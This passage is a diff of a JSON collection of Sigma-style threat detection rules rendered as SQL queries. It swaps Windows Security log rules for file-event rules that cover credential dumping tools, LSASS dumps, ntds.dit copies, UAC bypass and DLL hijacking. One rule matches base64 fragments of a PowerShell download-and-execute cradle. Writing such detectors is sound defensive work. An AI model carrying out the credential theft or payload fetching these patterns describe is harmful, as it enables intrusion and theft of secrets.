@Cyb3rWard0g", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE 
'%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 
'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE 
'%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE 
TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' 
ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file 
in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs 
WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + 
"status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE 
'%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task 
persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": 
"@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": 
"d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + 
